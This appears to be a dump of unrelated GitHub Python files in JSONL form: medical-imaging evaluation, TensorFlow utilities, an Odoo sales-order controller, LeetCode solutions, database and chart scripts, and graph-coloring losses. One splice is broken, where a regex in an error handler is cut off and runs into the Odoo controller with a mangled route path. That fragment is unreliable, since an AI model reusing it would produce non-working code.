display_mode='x',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n\n\n# displaying the mean of the co-registered fMRI (coronal)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n display_mode='y',\n cut_coords=6)\n\n# adding edges from the corresponding T1w 
image\ndisplay.add_edges(imageT1)\n","repo_name":"sathayas/fMRIClassFall2019","sub_path":"Norm/CoReg.py","file_name":"CoReg.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"7592338824","text":"import pickle\nimport sys\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.metrics as metrics\nfrom sklearn.utils import resample\n\n\ndef breast_or_image_level(prediction_file):\n df = pd.read_csv(prediction_file, header=0)\n if \"left_malignant\" in list(df.columns.values):\n return \"breast\"\n else:\n return \"image\"\n\n\ndef calc_confidence_interval(sample, confidence=0.95):\n sorted_scores = np.array(sample)\n sorted_scores.sort()\n\n margin = (1 - confidence) / 2 # e.g. 0.025 for 0.95 confidence range\n confidence_lower = sorted_scores[int(margin * len(sorted_scores))] # e.g. 0.025\n confidence_upper = sorted_scores[int((1 - margin) * len(sorted_scores))] # e.g. 0.975\n\n return confidence_lower, confidence_upper\n\n\ndef generate_statistics(labels, predictions, name, bootstrapping=False):\n roc_auc = metrics.roc_auc_score(labels, predictions)\n roc_curve_path = plot_roc_curve(predictions, labels, name)\n precision, recall, thresholds = metrics.precision_recall_curve(labels, predictions)\n pr_curve_path = plot_pr_curve(precision, recall, name)\n pr_auc = metrics.auc(recall, precision)\n\n print_str = \"\\nImage-level metrics:\" if 'image_level' in name else \"\\nBreast-level metrics:\"\n print(print_str)\n\n if bootstrapping:\n n_samples = len(labels)\n if n_samples < 8:\n print(\"Bootstrapping is calculated only when there are more than 8 samples.\")\n else:\n n_bootstraps = 2000\n\n b_roc_auc_list = []\n b_pr_auc_list = []\n for i in range(n_bootstraps):\n boot = resample(list(zip(labels, predictions)), replace=True, n_samples=n_samples)\n b_labels, b_predictions = list(zip(*boot))\n\n if len(list(set(b_labels))) == 1:\n n_bootstraps -= 1\n continue\n\n b_roc_auc = metrics.roc_auc_score(b_labels, b_predictions)\n b_roc_auc_list.append(b_roc_auc)\n precision, recall, thresholds = metrics.precision_recall_curve(b_labels, b_predictions)\n b_pr_auc = metrics.auc(recall, precision)\n b_pr_auc_list.append(b_pr_auc)\n\n roc_CI_lower, roc_CI_upper = calc_confidence_interval(b_roc_auc_list)\n pr_CI_lower, pr_CI_upper = calc_confidence_interval(b_pr_auc_list)\n print(f\"\\n AUROC: {roc_auc:.3f} (95% CI: {roc_CI_lower:.3f}-{roc_CI_upper:.3f})\",\n f\"\\n AUPRC: {pr_auc:.3f} (95% CI: {pr_CI_lower:.3f}-{pr_CI_upper:.3f})\",\n f\"\\n Confidence intervals calculated with bootstrap with {n_bootstraps} replicates.\")\n else:\n print(f\"\\n AUROC: {roc_auc:.3f}\",\n f\"\\n AUPRC: {pr_auc:.3f}\")\n \n print(f\"\\n ROC Plot: {roc_curve_path}\",\n f\"\\n PRC Plot: {pr_curve_path}\")\n\n\ndef get_image_level_scores(prediction_file, bootstrapping=False):\n prediction_df = pd.read_csv(prediction_file, header=0)\n predictions = prediction_df['malignant_pred'].tolist()\n labels = prediction_df['malignant_label'].tolist()\n name = prediction_file.split('.')[0] + \"_image_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef get_breast_level_scores(prediction_file, pickle_file, bootstrapping=False):\n prediction_df = pd.read_csv(prediction_file, header=0)\n predictions = prediction_df['left_malignant'].tolist() + prediction_df['right_malignant'].tolist()\n with open(pickle_file, 'rb') as f:\n 
exam_dict = pickle.load(f)\n left_malignant_labels = []\n right_malignant_labels = []\n for exam in exam_dict:\n left_malignant_labels.append(exam['cancer_label']['left_malignant'])\n right_malignant_labels.append(exam['cancer_label']['right_malignant'])\n labels = left_malignant_labels + right_malignant_labels\n\n name = prediction_file.split('.')[0] + \"_breast_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef get_breast_level_scores_from_image_level(prediction_file, pickle_file, bootstrapping=False):\n with open(pickle_file, 'rb') as f:\n exam_dict = pickle.load(f)\n\n il_prediction_df = pd.read_csv(prediction_file, header=0)\n\n left_malignancy = []\n right_malignancy = []\n left_labels = []\n right_labels = []\n\n # Iterate over pickle file\n for d in exam_dict:\n left_score = 0\n left_images = 0\n right_score = 0\n right_images = 0\n for v in ['L-CC', 'L-MLO', 'R-CC', 'R-MLO']:\n # Skip over views that don't have any images\n if v not in d or len(d[v]) == 0:\n continue\n\n if v[0] == 'L':\n left_score += il_prediction_df[il_prediction_df['image_index'].isin(d[v])]['malignant_pred'].iloc[0]\n left_images += 1\n else:\n right_score += il_prediction_df[il_prediction_df['image_index'].isin(d[v])]['malignant_pred'].iloc[0]\n right_images += 1\n\n # Check to make sure there are images for the view\n if left_images > 0:\n left_score /= left_images\n left_malignancy.append(left_score)\n left_labels.append(d['cancer_label']['left_malignant'])\n\n if right_images > 0:\n right_score /= right_images\n right_malignancy.append(right_score)\n right_labels.append(d['cancer_label']['right_malignant'])\n\n predictions = left_malignancy + right_malignancy\n labels = left_labels + right_labels\n name = prediction_file.split('.')[0] + \"_breast_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef plot_pr_curve(precision, recall, name):\n save_path = name + '_pr_curve.png'\n plt.figure(figsize=(5, 5))\n plt.plot(recall, precision)\n plt.title(\"PR Curve\")\n plt.xlabel(\"Recall\")\n plt.ylabel(\"Precision\")\n plt.savefig(save_path)\n return save_path\n\n\ndef plot_roc_curve(preds, labels, name):\n save_path = name + '_roc_curve.png'\n fpr, tpr, threshold = metrics.roc_curve(labels, preds)\n plt.figure(figsize=(5, 5))\n plt.plot(fpr, tpr)\n plt.title(\"ROC Curve\")\n plt.xlabel(\"FPR\")\n plt.ylabel(\"TPR\")\n plt.savefig(save_path)\n return save_path\n\n\ndef main(pickle_file, prediction_file, bootstrapping):\n if str(bootstrapping.lower()) == 'no_bootstrap':\n bootstrapping = False\n else:\n bootstrapping = True\n breast_or_image = breast_or_image_level(prediction_file)\n if breast_or_image == \"image\":\n get_breast_level_scores_from_image_level(prediction_file, pickle_file, bootstrapping)\n get_image_level_scores(prediction_file, bootstrapping)\n else:\n get_breast_level_scores(prediction_file, pickle_file, bootstrapping)\n\n print(\"Prediction file: {}\".format(prediction_file))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","repo_name":"nyukat/mammography_metarepository","sub_path":"evaluation/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"83"} +{"seq_id":"8804329156","text":"from typing import Union, List, Optional\nimport warnings\nimport logging\nfrom typing import Mapping\n\nimport inspect\nimport numpy as np\nimport tensorflow as tf\n\n\nlogger = 
logging.getLogger(__name__)\n\n\ndef booleans_processing(config, **kwargs):\n \"\"\"\n Process the input booleans of each model.\n Args:\n config ([`PretrainedConfig`]):\n The config of the running model.\n **kwargs:\n The boolean parameters\n Returns:\n A dictionary with the proper values for each boolean\n \"\"\"\n final_booleans = {}\n\n # Pure conv models (such as ConvNext) do not have `output_attentions`. If the signature has\n # `output_attentions`, it will be present here in `kwargs`, even if unset (in that case, as `None`)\n if \"output_attentions\" in kwargs:\n final_booleans[\"output_attentions\"] = (\n kwargs[\"output_attentions\"] if kwargs[\"output_attentions\"] is not None else config.output_attentions\n )\n final_booleans[\"output_hidden_states\"] = (\n kwargs[\"output_hidden_states\"] if kwargs[\"output_hidden_states\"] is not None else config.output_hidden_states\n )\n final_booleans[\"return_dict\"] = kwargs[\"return_dict\"] if kwargs[\"return_dict\"] is not None else config.return_dict\n\n if \"use_cache\" in kwargs:\n final_booleans[\"use_cache\"] = (\n kwargs[\"use_cache\"] if kwargs[\"use_cache\"] is not None else getattr(\n config, \"use_cache\", None)\n )\n return final_booleans\n\n\ndef input_values_processing(func, config, input_values, **kwargs):\n \"\"\"\n Process the input of each TensorFlow model including the booleans. In case of a list of symbolic inputs, each input\n has to be named according to the parameter names, i.e. `input_values = tf.keras.Input(shape=(128,),\n dtype='float32', name=\"input_values\")` otherwise the order of the tensors will not be guaranteed during the\n training.\n Args:\n func (`callable`):\n The callable function of the TensorFlow model.\n config ([`PretrainedConfig`]):\n The config of the running model.\n **kwargs:\n The inputs of the model.\n Returns:\n A dictionary with the processed inputs, keyed by parameter name.\n \"\"\"\n signature = dict(inspect.signature(func).parameters)\n signature.pop(\"kwargs\", None)\n signature.pop(\"self\", None)\n parameter_names = list(signature.keys())\n output = {}\n allowed_types = (tf.Tensor, bool, int,\n tuple, list, dict, np.ndarray)\n\n for k, v in kwargs.items():\n if isinstance(v, allowed_types) or v is None:\n output[k] = v\n else:\n raise ValueError(\n f\"Data of type {type(v)} is not allowed only {allowed_types} is accepted for {k}.\")\n\n if isinstance(input_values, (tuple, list)):\n for i, input in enumerate(input_values):\n # EagerTensors don't allow to use the .name property so we check for a real Tensor\n if type(input) == tf.Tensor:\n # Tensor names have always the pattern `name:id` then we check only the\n # `name` part\n tensor_name = input.name.split(\":\")[0]\n\n if tensor_name in parameter_names:\n output[tensor_name] = input\n else:\n output[parameter_names[i]] = input\n elif isinstance(input, allowed_types) or input is None:\n output[parameter_names[i]] = input\n else:\n raise ValueError(\n f\"Data of type {type(input)} is not allowed only {allowed_types} is accepted for\"\n f\" {parameter_names[i]}.\"\n )\n elif isinstance(input_values, Mapping):\n if \"inputs\" in input_values:\n warnings.warn(\n \"The `inputs` argument is deprecated and will be removed in a future version, use `input_values`\"\n \" instead.\",\n FutureWarning,\n )\n\n output[\"input_values\"] = input_values.pop(\"inputs\")\n\n if \"decoder_cached_states\" in input_values:\n warnings.warn(\n \"The `decoder_cached_states` argument is deprecated and will be removed in a future version, 
use\"\n \" `past_key_values` instead.\",\n FutureWarning,\n )\n output[\"past_key_values\"] = input_values.pop(\n \"decoder_cached_states\")\n\n for k, v in dict(input_values).items():\n if isinstance(v, allowed_types) or v is None:\n output[k] = v\n elif k not in parameter_names and \"args\" not in parameter_names:\n logger.warning(\n f\"The parameter {k} does not belongs to the parameter list {parameter_names} and will be ignored.\"\n )\n continue\n else:\n raise ValueError(\n f\"Data of type {type(v)} is not allowed only {allowed_types} is accepted for {k}.\")\n else:\n if isinstance(input_values, tf.Tensor) or input_values is None:\n output[parameter_names[0]] = input_values\n else:\n raise ValueError(\n f\"Data of type {type(input_values)} is not allowed only {allowed_types} is accepted for\"\n f\" {parameter_names[0]}.\"\n )\n\n for name in parameter_names:\n if name not in list(output.keys()) and name != \"args\":\n output[name] = kwargs.pop(name, signature[name].default)\n\n # When creating a SavedModel TF calls the method with LayerCall.__call__(args, **kwargs)\n # So to respect the proper output we have to add this exception\n if \"args\" in output:\n if output[\"args\"] is not None and type(output[\"args\"]) == tf.Tensor:\n tensor_name = output[\"args\"].name.split(\":\")[0]\n output[tensor_name] = output[\"args\"]\n else:\n # `args` in this case is always the first parameter, then `input_values`\n output[\"input_values\"] = output[\"args\"]\n\n del output[\"args\"]\n\n if \"kwargs\" in output:\n del output[\"kwargs\"]\n\n boolean_dict = {\n k: v\n for k, v in output.items()\n if k in [\"return_dict\", \"output_attentions\", \"output_hidden_states\", \"use_cache\"]\n }\n\n output.update(booleans_processing(config=config, **boolean_dict))\n\n return output\n\n\ndef shape_list(tensor: Union[tf.Tensor, np.ndarray]) -> List[int]:\n \"\"\"\n Deal with dynamic shape in tensorflow cleanly.\n Args:\n tensor (`tf.Tensor` or `np.ndarray`): The tensor we want the shape of.\n Returns:\n `List[int]`: The shape of the tensor as a list.\n \"\"\"\n if isinstance(tensor, np.ndarray):\n return list(tensor.shape)\n\n dynamic = tf.shape(tensor)\n\n if tensor.shape == tf.TensorShape(None):\n return dynamic\n\n static = tensor.shape.as_list()\n\n return [dynamic[i] if s is None else s for i, s in enumerate(static)]\n\n\ndef stable_softmax(logits: tf.Tensor, axis: Optional[int] = None, name: Optional[str] = None) -> tf.Tensor:\n \"\"\"\n Stable wrapper that returns the same output as `tf.nn.softmax`, but that works reliably with XLA on CPU. It is\n meant as a workaround for the [following issue](https://github.com/tensorflow/tensorflow/issues/55682), and will be\n removed after it gets fixed. The arguments and outputs are the same as `tf.nn.softmax`, and relies on the fact that\n `softmax(x) = softmax(x + c)` (see https://ogunlao.github.io/2020/04/26/you_dont_really_know_softmax.html).\n Args:\n logits (`tf.Tensor`):\n Must be one of the following types: half, float32, float64.\n axis (`int`, *optional*):\n The dimension softmax would be performed on. The default is -1 which indicates the last dimension.\n name (`str`, *optional*):\n A name for the operation.\n Returns:\n `tf.Tensor`:\n A Tensor. Has the same type and shape as logits.\n \"\"\"\n # TODO: When the issue linked above gets sorted, add a check on TF version here and use the original function if\n # it has the fix. 
After we drop the support for unfixed versions, remove this function.\n return tf.nn.softmax(logits=logits + 1e-9, axis=axis, name=name)\n\n\ndef get_initializer(initializer_range: float = 0.02) -> tf.initializers.TruncatedNormal:\n \"\"\"\n Creates a `tf.initializers.TruncatedNormal` with the given range.\n Args:\n initializer_range (*float*, defaults to 0.02): Standard deviation of the initializer range.\n Returns:\n `tf.initializers.TruncatedNormal`: The truncated normal initializer.\n \"\"\"\n return tf.keras.initializers.TruncatedNormal(stddev=initializer_range)\n","repo_name":"tamnguyenvan/tf_wav2vec2forctc","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38753002925","text":"import json\nimport logging\nimport re\nimport requests\n\n\ndef handle_non_200(answer):\n try:\n rsp = json.loads(answer.content)\n detail = rsp.get('detail', answer.text)\n except json.decoder.JSONDecodeError:\n try:\n detail = re.search(r\"(?<=',\n '/orders//'],\n type='json', auth='none', methods=['POST'])\n def create_sales_orders(self, action, root=None):\n status_code = 400\n environ = request.httprequest.headers.environ.copy()\n\n key = environ.get('HTTP_X_USER_ACCESS_KEY', False)\n token = environ.get('HTTP_X_USER_ACCESS_TOKEN', False)\n db_name = environ.get('HTTP_TENANT_DB', False)\n\n if not db_name:\n host = environ.get('HTTP_HOST', \"\")\n db_name = host.replace(\".\", \"_\").split(\":\")[0]\n\n registry = RegistryManager.get(db_name)\n with registry.cursor() as cr:\n connection_model = registry['cenit.connection']\n domain = [('key', '=', key), ('token', '=', token)]\n _logger.info(\n \"Searching for a 'cenit.connection' with key '%s' and \"\n \"matching token\", key)\n rc = connection_model.search(cr, SUPERUSER_ID, domain)\n _logger.info(\"Candidate connections: %s\", rc)\n if rc:\n r = self.create_order(cr, request)\n if not r:\n status_code = '200'\n else:\n return r\n else:\n status_code = 404\n\n return {'status': status_code}\n\n def create_order(self, cr, request):\n order_data = json.dumps(request.jsonrequest)\n order_data = simplejson.loads(str(order_data.decode()))\n\n partner_name = order_data['partner_id']['name']\n context = request.context\n\n partner_id = self.get_id_from_record(cr, 'res.partner', [('name', '=', partner_name)], context=context)\n if partner_id:\n order_data['partner_id'] = partner_id # Updating partner_id(Customer)\n order_data['partner_invoice_id'] = partner_id # Updating invoice address\n order_data['partner_shipping_id'] = partner_id # Updating shipping address\n\n order_data['payment_term_id'] = self.get_id_from_record(cr, 'account.payment.term',\n [('name', '=', order_data['payment_term_id'])],\n context=context)\n\n order_data['warehouse_id'] = self.get_id_from_record(cr, 'stock.warehouse',\n [('name', '=', order_data['warehouse_id'])],\n context=context)\n\n order_data['user_id'] = self.get_id_from_record(cr, 'res.users', [('name', '=', order_data['user_id'])],\n context=context) # Updating sales person\n\n order_data['team_id'] = self.get_id_from_record(cr, 'crm.team', [('name', '=', order_data['team_id'])],\n context=context)\n order_data['invoice_status'] = 'invoiced'\n\n errors = None\n\n lines = {}\n if order_data.get('order_line'):\n lines = order_data.pop('order_line')\n saleorder_registry = request.registry['sale.order']\n try:\n order_id = self.get_id_from_record(cr, 'sale.order', [('name', '=', 
order_data.get('name'))], context=context)\n if not order_id:\n order_id = saleorder_registry.create(cr, SUPERUSER_ID, order_data)\n else:\n saleorder_registry.write(cr, SUPERUSER_ID, order_id, order_data)\n if order_id:\n # Create order lines\n if lines:\n for line in lines:\n line['product_id'] = self.get_id_from_record(cr, 'product.product',\n [('name', '=', line['name'])],\n context=context)\n i_registry = request.registry['product.product']\n # if not line['product_id']:\n # i_registry.create(cr, SUPERUSER_ID, )\n\n product = i_registry.browse(cr, SUPERUSER_ID, line['product_id'], context=context)[0]\n line['name'] = product['name']\n line['order_id'] = order_id\n line['product_uom'] = product['uom_id']['id']\n line['price_unit'] = product['list_price']\n line['customer_lead'] = product['sale_delay']\n line['tax_id'] = [x.id for x in product['taxes_id']]\n\n line['property_account_income_id'] = product['property_account_income_id']['id']\n line['property_account_expense_id'] = product['property_account_expense_id']['id']\n\n line_id = self.get_id_from_record(cr, 'sale.order.line', [('order_id', '=', order_id),\n ('product_id', '=', product['id'])], context=context)\n if not line_id:\n request.registry['sale.order.line'].create(cr, SUPERUSER_ID, line)\n else:\n request.registry['sale.order.line'].write(cr, SUPERUSER_ID, line_id, line)\n except Exception as e:\n _logger.error(e)\n errors = e\n\n if not errors:\n order_data['order_line'] = lines\n errors = self.create_invoice(cr, order_data, request, context)\n\n return {'errors': errors} if errors else None\n\n return {'errors': 'There is no Customer named %s' % partner_name}\n\n def get_id_from_record(self, cr, model, domain, context):\n i_registry = request.registry[model]\n rc = i_registry.search(cr, SUPERUSER_ID, domain, context=context) # Returns id\n if rc:\n return rc[0]\n else:\n return None\n\n def create_invoice(self, cr, order, request, context):\n i_registry = request.registry['account.invoice']\n\n invoice_data = {}\n invoice_data['partner_id'] = order.get('partner_id', '')\n invoice_data['jmd_partner_shipping_id'] = order.get('partner_shipping_id', '')\n invoice_data['payment_term_id'] = order.get('payment_term_id', '')\n invoice_data['date_invoice'] = order.get('date_order', datetime.now())\n invoice_data['user_id'] = order.get('user_id', '')\n invoice_data['team_id'] = order.get('team_id', '')\n # invoice_data['currency_id'] = 'SGD'\n\n journal_id = self.get_id_from_record(cr, 'account.journal', [('name', '=', 'Sales Journal')], context=context)\n invoice_data['journal_id'] = journal_id\n\n account_id = self.get_id_from_record(cr, 'account.account', [('name', '=', 'Trade Debtors')], context=context)\n invoice_data['account_id'] = account_id\n\n invoice_data['origin'] = order.get('name', '')\n invoice_data['state'] = 'open'\n\n\n errors = ''\n try:\n invoice_id = self.get_id_from_record(cr, 'account.invoice', [('origin', '=', order.get('name'))], context=context)\n if not invoice_id:\n invoice_id = i_registry.create(cr, SUPERUSER_ID, invoice_data)\n else:\n i_registry.write(cr, SUPERUSER_ID, invoice_id, invoice_data)\n\n if invoice_id:\n orderlines = order.get('order_line', {})\n for ord in orderlines:\n ord['quantity'] = ord['product_uom_qty']\n ord.pop('product_uom_qty')\n ord['uom_id'] = ord['product_uom']\n ord.pop('product_uom')\n ord['invoice_line_tax_ids'] = ord['tax_id']\n ord.pop('tax_id')\n ord['invoice_id'] = invoice_id\n ord['account_id'] = ord.get('property_account_income_id') or ord.get('property_account_expense_id')\n\n line_id = self.get_id_from_record(cr, 'account.invoice.line', [('invoice_id', '=', invoice_id),\n ('product_id', '=', ord['product_id'])], context=context)\n if not line_id:\n request.registry['account.invoice.line'].create(cr, SUPERUSER_ID, ord)\n else:\n request.registry['account.invoice.line'].write(cr, SUPERUSER_ID, line_id, ord)\n except Exception as e:\n _logger.error(e)\n errors = e\n\n\n return errors if errors else None","repo_name":"andhit-r/odoo-integrations","sub_path":"cenit_magento_1_9_custom/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
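The controller above repeats one pattern throughout: search for a record by domain, then create it or write to it. A generic sketch of that upsert step with a plain dict standing in for the ORM (all names here are illustrative, not the Odoo API):

def upsert(store, key, values):
    if key in store:
        store[key].update(values)   # analogous to registry.write(...)
    else:
        store[key] = dict(values)   # analogous to registry.create(...)
    return store[key]

orders = {}
upsert(orders, "SO001", {"partner": "Acme", "total": 100})
upsert(orders, "SO001", {"total": 120})  # second call updates in place
print(orders)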
+{"seq_id":"3678458841","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n1946. Largest Number After Mutating Substring\nhttps://leetcode.com/problems/largest-number-after-mutating-substring/\n\nExample 1:\n\nInput: num = \"132\", change = [9,8,5,0,3,6,4,2,6,8]\nOutput: \"832\"\nExplanation: Replace the substring \"1\":\n- 1 maps to change[1] = 8.\nThus, \"132\" becomes \"832\".\n\"832\" is the largest number that can be created, so return it.\n\nExample 2:\n\nInput: num = \"021\", change = [9,4,3,5,7,2,1,9,0,6]\nOutput: \"934\"\nExplanation: Replace the substring \"021\":\n- 0 maps to change[0] = 9.\n- 2 maps to change[2] = 3.\n- 1 maps to change[1] = 4.\nThus, \"021\" becomes \"934\".\n\"934\" is the largest number that can be created, so return it.\n\nExample 3:\n\nInput: num = \"5\", change = [1,4,7,5,3,2,5,6,9,4]\nOutput: \"5\"\nExplanation: \"5\" is already the largest number that can be created, so return it.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def maximumNumber1(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N^2) / SC: O(N)\n Time Limit Exceeded\n \"\"\"\n max_num = num\n for i in range(len(num)):\n changed_num = num[:i] + str(change[int(num[i])]) + num[i + 1 :]\n if changed_num >= max_num:\n max_num = changed_num\n\n for j in range(1, len(num[i + 1 :]) + 1):\n changed_num = changed_num[: i + j] + str(change[int(num[i + j])]) + changed_num[i + j + 1 :]\n if changed_num >= max_num:\n max_num = changed_num\n else:\n break\n return max_num\n\n def maximumNumber2(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N) / SC: O(N)\n \"\"\"\n num_list = list(num)\n changed = False\n for i in range(len(num_list)):\n if change[int(num_list[i])] > int(num_list[i]):\n num_list[i] = str(change[int(num_list[i])])\n changed = True\n elif changed and change[int(num_list[i])] < int(num_list[i]):\n break\n return \"\".join(num_list)\n\n def maximumNumber3(self, num: str, change: List[int]) -> str:\n \"\"\"\n TC: O(N^2) / SC: O(N)\n \"\"\"\n changed = False\n for i in range(len(list(num))):\n if str(change[int(num[i])]) > num[i]:\n num = num[:i] + str(change[int(num[i])]) + num[i + 1 :] # TC: O(N)\n changed = True\n elif changed and str(change[int(num[i])]) < num[i]:\n break\n return num\n","repo_name":"dongminlee94/coding-practice-leetcode","sub_path":"src/weekly_contest_251/1946_largest-number-after-mutating-substring.py","file_name":"1946_largest-number-after-mutating-substring.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
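A quick usage check of the O(N) greedy variant above against the examples quoted in the module docstring:

s = Solution()
print(s.maximumNumber2("132", [9, 8, 5, 0, 3, 6, 4, 2, 6, 8]))  # expected "832"
print(s.maximumNumber2("021", [9, 4, 3, 5, 7, 2, 1, 9, 0, 6]))  # expected "934"
print(s.maximumNumber2("5", [1, 4, 7, 5, 3, 2, 5, 6, 9, 4]))    # expected "5"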
+{"seq_id":"10462482907","text":"import db_connect as dbc\n\n# 1. Get db\nconn = dbc.do_db_connect()\ndb = conn.cursor()\n\n# 2. Make sql\nsql = \"DELETE FROM customers WHERE ADDRESS = %s\"\nadr = (\"Mountain 21\", )\n\n# 3. Delete\ndb.execute(sql, adr)\nconn.commit()\n\n# 4. Result\nprint(db.rowcount, \" record(s) deleted\")","repo_name":"icelove82/python-study-adv","sub_path":"db_delete.py","file_name":"db_delete.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"18751583242","text":"ticket = int(input('Enter the number of tickets you want to buy (1 to 100): '))\r\nprint()\r\nif ticket <= 0: # validate the entered ticket count\r\n ticket = int(input('Enter a valid number of tickets you want to buy (1 to 100): '))\r\n\r\ndiscount = ticket # used to check whether a discount applies\r\ncount1 = 0 # total for ages 18 to 25\r\ncount2 = 0 # total for ages 26 and up\r\nwhile ticket != 0:\r\n age = int(input('Enter the age of the online conference participant: '))\r\n\r\n if age < 18:\r\n print('Persons under 18 attend the conference free of charge.')\r\n\r\n elif 18 <= age <= 25:\r\n count1 += 990\r\n\r\n else:\r\n count2 += 1390\r\n ticket -= 1\r\n\r\nif discount > 3:\r\n discount = int((count1 + count2) * 10 / 100) # compute the discount\r\n print('Total due, with the 10% discount:', (count1 + count2) - discount, 'rub.')\r\nelse:\r\n print('Total due:', count1 + count2, 'rub.')\r\n","repo_name":"Apapqq/18.8.19","sub_path":"18.8.19.py","file_name":"18.8.19.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"48828615814","text":"from torch_geometric.utils import to_dense_adj\nimport torch\n\n\ndef count_collisions(coloring, edge_index):\n col = 0\n for i in range(edge_index.shape[1]):\n n1, n2 = edge_index[0][i], edge_index[1][i]\n if coloring[n1] == coloring[n2]:\n col += 1\n return col/2\n\n\ndef get_bad_edges(coloring, edge_index):\n bad_edges = {}\n for i in range(edge_index.shape[1]):\n n1, n2 = edge_index[0][i], edge_index[1][i]\n if coloring[n1] == coloring[n2]:\n bad_edges[(n1.item(), n2.item())] = 'red'\n return bad_edges\n\n\nclass PottsLoss:\n def __init__(self, edge_list):\n self.adj = to_dense_adj(edge_list)\n\n def __call__(self, col_probs):\n loss = torch.sum(torch.mm(col_probs, col_probs.T) * self.adj) / 2\n return loss\n\n# def dot_product_loss(col_probs, edge_list):\n# adj = to_dense_adj(edge_list).squeeze(0)\n# loss = torch.sum(torch.mm(col_probs, col_probs.T) * adj)/2\n# return loss/2\n\n\nclass WangLoss:\n def __init__(self, edge_list, lam=0.2):\n self.adj = to_dense_adj(edge_list)\n self.lam = lam\n\n def __call__(self, col_probs):\n log_probs = torch.log(col_probs)\n loss = torch.sum(torch.mm(col_probs, col_probs.T) * self.adj) / 2\n loss += -self.lam*torch.trace(torch.mm(col_probs, log_probs.T))\n return loss\n\n# def self_info_loss(col_probs):\n# log_probs = torch.log(col_probs)\n# loss = torch.trace(torch.mm(col_probs, log_probs.T))\n# return loss\n#\n#\n# def wang_loss_function(col_probs, edge_list, lam):\n# # Loss function from Wang's 2023 paper: A Graph Neural Network with Negative Message Passing for Graph Coloring\n# loss = dot_product_loss(col_probs, edge_list) + lam*self_info_loss(col_probs)\n# return loss\n","repo_name":"dipplestix/gnn_coloring","sub_path":"utilities/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
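A tiny demo of the losses above: on an undirected triangle with one-hot color assignments, PottsLoss reduces to the number of monochromatic edges, matching count_collisions:

import torch

edge_index = torch.tensor([[0, 1, 1, 2, 2, 0],
                           [1, 0, 2, 1, 0, 2]])  # triangle, both directions
all_same = torch.tensor([[1., 0.], [1., 0.], [1., 0.]])    # every node gets color 0
two_colors = torch.tensor([[1., 0.], [0., 1.], [1., 0.]])  # nodes 0 and 2 still clash
loss = PottsLoss(edge_index)
print(loss(all_same), loss(two_colors))         # tensor(3.), tensor(1.)
print(count_collisions([0, 0, 0], edge_index))  # 3.0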
данными\n    from matplotlib import ... - для работы с графиками\n\nФункции:\n    _init_subplots - инициализировать plots\n    _setup_axis - настроить ось\n    build_qualitative_charts - построить графики качественной переменной\n    build_quantitative_charts - построить графики количественной переменной\n\n\"\"\"\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\ndef _init_subplots(num: int, title: str) -> list[plt.Axes]:\n    \"\"\"Инициализировать plots.\n\n    Аргументы:\n        num: int - количество графиков\n        title: str - заголовок графиков\n\n    Возвращает список созданных осей\n\n    \"\"\"\n    fig, axes = plt.subplots(1, num)\n    fig.set_figwidth(num * 9)\n    plt.suptitle(title)\n    return axes\n\n\ndef _setup_axis(axis: plt.Axes, title: str, ylabel: str):\n    \"\"\"Настроить ось.\n\n    Аргументы:\n        axis: plt.Axes - ось\n        title: str - заголовок графика\n        ylabel: str - подпись y\n\n    \"\"\"\n    axis.set_title(title)\n    axis.set_xlabel(\"Значения\", labelpad=15)\n    axis.set_ylabel(ylabel, labelpad=15)\n\n\ndef build_qualitative_charts(data: pd.Series, title: str):\n    \"\"\"Построить графики качественной переменной.\n\n    Аргументы:\n        data: pd.Series - данные переменной\n        title: str - заголовок графиков\n\n    \"\"\"\n    axes = _init_subplots(2, title)\n    value_counts = data.value_counts()\n\n    _setup_axis(axes[0], \"Столбчатая диагармма\", \"Количество\")\n    axes[0].tick_params(\"x\", labelrotation=90)\n    axes[0].bar(value_counts.index, value_counts)\n\n    axes[1].set_title(\"Круговая диаграмма\")\n    axes[1].pie(value_counts, autopct=\"%1.2f%%\", pctdistance=1.2)\n    axes[1].legend(value_counts.index, title=\"Значения\",\n                   bbox_to_anchor=(1.08, 1))\n\n    plt.show()\n\n\ndef build_quantitative_charts(data: pd.Series, title: str):\n    \"\"\"Построить графики количественной переменной.\n\n    Аргументы:\n        data: pd.Series - данные переменной\n        title: str - заголовок графиков\n\n    \"\"\"\n    axes = _init_subplots(3, title)\n    seq = data.dropna()\n\n    _setup_axis(axes[0], \"Гистограмма\", \"Частота\")\n    axes[0].hist(seq)\n\n    seq.plot.kde(0.1, ax=axes[1])\n    _setup_axis(axes[1], \"График плотности\", \"Плотность\")\n\n    _setup_axis(axes[2], \"Диаграмма размаха\", title)\n    